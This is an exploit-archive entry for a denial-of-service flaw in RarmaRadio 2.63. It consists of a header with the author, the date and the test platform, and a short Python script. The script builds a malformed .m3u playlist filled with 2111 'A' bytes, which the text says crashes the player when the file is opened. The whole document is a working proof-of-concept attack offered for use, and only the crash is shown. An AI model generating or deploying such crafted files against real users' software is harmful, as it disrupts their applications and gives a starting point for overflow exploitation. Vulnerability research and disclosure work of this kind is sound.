|
# ########################################
# Exploit Title : RarmaRadio 2.63 (.m3u) Denial of Service Vulnerability
# Software link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe , http://www.raimersoft.com/downloads.aspx
# Version : 2.63
# Tested on : Windows XP SP3 English
# Date : 2/07/2011
# Author : X-h4ck
# Website : http://www.pirate.al , # PirateAL Crew @2011
# Email : mem001@live.com
# Greetz : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta
# ########################################
#!/usr/bin/python
filename = "crash.m3u"
junk = "\x41" * 2111
FILE = open(filename, "w")
FILE.write(junk)
FILE.close()
print "Open", filename, "on RarmaRadio, and the application will Crash"
|